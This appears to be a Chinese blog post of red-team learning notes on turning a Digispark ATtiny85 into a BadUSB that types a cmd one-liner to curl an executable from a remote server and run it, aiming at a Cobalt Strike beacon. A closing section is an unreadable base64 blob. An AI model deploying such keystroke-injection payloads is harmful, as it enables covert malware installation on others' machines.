badusb踩坑&近期感想

前言:

近期在公司内部学了一点红队技能,虽然目前用不上,但是做个记录,顺便发牢骚。

致谢&参考

https://www.freebuf.com/articles/system/261020.html

https://blog.csdn.net/sxhexin/article/details/87914649

https://www.anquanke.com/post/id/227477

https://www.freebuf.com/articles/system/261020.html

Badusb 插入上线cobalt strike

准备工作

ATtiny85 开发板、arduino IDE下载https://www.arduino.cc/en/Main/Softwaredigispark。暂时先不要装驱动!!驱动有大坑。

看freeebuf里面的教程装完驱动,烧录完只能执行一次,需要更新下固件才可以重复使用,后面会提到。

环境配置

打开IDE,在文件->首选项中加入附加开发板管理,附加开发板管理网址处写

1
http://digistump.com/package_digistump_index.json

注意,这里需要翻墙,后面添加开发板下载相关配置时也需要翻墙,现在就翻着 别断了。

添加开发板

IDE中-工具-开发板管理,类型-contributed/贡献,选择

然后选安装(翻墙)

安装好后,选择这个16.5mhz的开发板。

更新 boot loader

更新 BootLoader的教程看 https://blog.csdn.net/sxhexin/article/details/87914649,这里不再赘述,跟着这个教程走没问题的,如果你之前有装相关驱动,请把驱动卸载干净!!!

更新BootLoader是因为避免踩烧录完只能运行一次的坑!!

BootLoader是大坑,一定要好好弄!

编写代码

有兴趣一步步走的可以写个测试代码 cmd弹个窗什么的,我这里一步到位,直接远程加载exe。

对于cs 可以生成powershell,然后cmd里面powershell加载调用直接上线。

使用CMD远程下载可执行文件

我选择用cmd的原因是因为 我还不会powershell免杀(2333)

所以 探索了下 如何类似Linux执行多条命令,发现在Windows cmd下是and符号&。

执行命令的代码框架如下:

1
2
3
4
5
6
7
8
9
10
11
12
#include "DigiKeyboard.h"//库文件
void setup() {
// setup函数只运行一次
DigiKeyboard.delay(2000);//等待两秒,给电脑自动加载配置时间
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);//摁住WIN键
DigiKeyboard.delay(300);//等待300毫秒
DigiKeyboard.println("cmd");//输入CMD
DigiKeyboard.delay(300);
DigiKeyboard.println("curl http://12xxxx0/calc.exe > E:\\calc.exe & E:\\calc.exe");//执行PAYLOAD,双引号需要斜杠转义
}
void loop() {
}

注意,在最后一个注释处,是在前面语句打开cmd黑框的情况下,在cmd中输入的语句。两个反斜杠是为了转义。

我的思路是,将可执行exe文件上传至服务器,通过curl的方式下载并重定向至某个驱动器并执行。

我本来想放到C盘,但是放到C盘,有可能存在权限问题(放在C:\Windows\Temp)目录下也有些问题,于是放到了D/E盘。

将上述代码在IDE中输入后ctrl+u上传,然后插入attiny85

一定是先拔出来,出现这个 60seconds的时候插进去,出现下面这一串代表写入成功 并且会自动执行一次。

然后拔出来 再插进去的时候 就有弹计算器的效果了。(小思考,如何在执行完exe后自动关闭cmd黑框?)

效果如下:

CMD上线CS

嫖来了大佬的免杀方法2333 试一下exe上线cs

小思考的答案是:命令后跟& exit;

23333

杂谈

5pyA6L+R5LiN5pivaHfkuYjvvIzorqTor4bkuIDkuKrlhazlj7jnmoRocuWnkOWnkO+8jOacgOi/keS5n+WcqGh35oub5Lq677yM6ZyA6KaB5LiA5Lqb5pyJ5omL5bCx6KGM55qE5bKX5L2N77yM5a+55rKh5Y67aHfov4cg5bm25LiU5oqA5pyv5LiN5oCO5LmI5qC355qE5ZCM5a2m5p2l6K+077yMNDAw5LiA5aSp55qE5b6F6YGH44CB5YyF5ZCD5L2P44CB5LiN6ZyA6KaB6Ieq5bex5Z6r6ZKx44CB6aG555uu546w5Zy65pyJ5Lq65bim77yM5oiR6KeJ5b6X5bey57uP5b6I5aW95ZWm44CC5aaC5p6c5oiR5aSn5LqM55qE5pe25YCZ5pyJ6L+Z56eN5py65Lya77yM5ZOq5oCV5LiN57uZ5oiR5bel6LWE77yM5oiR5Lmf6KaB5Y6744CC5oiR5L2c5Li65LiA5Liq5a2m55Sf77yM6Zmk5LqG5aSW5Ye66Ieq5bex5o6l6aG555uu77yM5a6e5Zyo5piv5oOz5LiN5Yiw6L+Y5pyJ5LuA5LmI5q+UaHfmm7Tlpb3nmoTog73nm7jlr7nku47nroDljZXlvIDlp4vmjqXop6blronlhajlrp7miJjnmoTlnLrmma/kuobjgILvvIhTUkPkuI3nrpfvvIxTUkPkuZ/pnIDopoHnm7jlvZPnmoTlronlhajln7rnoYDjgILvvInmiJHmiorov5nkuKrmtLvmjqjov4fljrvkuYvlkI7vvIzkuInkuKrluIjlvJ/kuZ/lvojnu5nlipvvvIzpgJrov4fkuobpnaLor5XjgILlj6/kuIfkuIfmsqHmg7PliLDor7flgYfnmoTml7blgJnlh7rpl67popjkuobvvIzlr7zlkZjor7TnjrDlnKjnmoTph43lv4PlupTor6XmmK/kuJPkuJror77lrabkuaDjgIHogIzkuI3mmK/mg7PnnYDlh7rljrvlrp7kuaDvvIzlubbkuJTmi7/miJHkuL7kvovlrZAyMzMz44CC5pyA5ZCO6L+Y6K+077yM5Y+q6KaB5L2g5Y675LqG5bCx57uZ5L2g6YCA5a2m77yM55yf5LiN5oiz44CC54S26ICM5pu05Y+v56yR55qE5piv77yM5p+Q6ICB5biI5ZyoMTfnuqfpgJrnn6XnvqTlj5Hkuoblj6bkuIDlrrbmnLrmnoTnmoRod+Wuo+S8oO+8jOW+hemBh+aIkeS5n+ivtOS4i++8jDMwMC00MDDkuIDlpKnvvIzkuI3ljIXlkIPkvY/vvIzmnInlhY3otLnln7norq3vvIzmoLnmja7ln7norq3ogIPmoLjnu5PmnpzliIbnuqLok53pmJ/vvIjvvJ/vvInvvIznhLblkI7miJHmiZPnlLXor53ov4fljrvpl67kuobkuIvvvIzmu6HlmLTot5/miJHosIjnkIbmg7PosIjpgZPlvrfosIjmioDmnK/jgIHlsLHor7TlrabnlJ/kuI3opoHogIHmg7PnnYDmjKPpkrHkupHkupHjgILmiJHkvLDorqEg5LiN57uZ5oiR6L+Z5LiJ5Liq5biI5byf5YGH55qE5Y6f5Zug77yM5bqU6K+l5piv5Yqo5LqG5LuW5Lus55qE6JuL57OV5LqG5ZCn77yM5LuO6YKj6L656LWw6IO95oq96ZKxMjMzM+OAguWtpumZouWvueaIkeW+iOWlveOAgeWQhOS9jemihuWvvOiAgeW4iOWSjOiUvOWPr+S6su+8jOWtpumZouS5n+e7meS6huaIkeaOqOWFjeWQjemine+8jOmhuuWIqeaOqOWFjeiHs1VFU1RD44CC5b+D5oCA5oSf5oGp5LmL5b+D77yM5oOz5o6o5biI5byf5LiA5oqK77yM5Y67aHfvvIzmsqHmg7PliLDnq5/nhLbkuI3nu5nlh4blgYfvvIznnJ/nmoTvvIzlv4Pph4zpnaLlh4nkuoblvojlpJrjgILkuI3or7TkuoZ+57un57ut5YaZ5q+V5Lia6K665paH5LqGfg==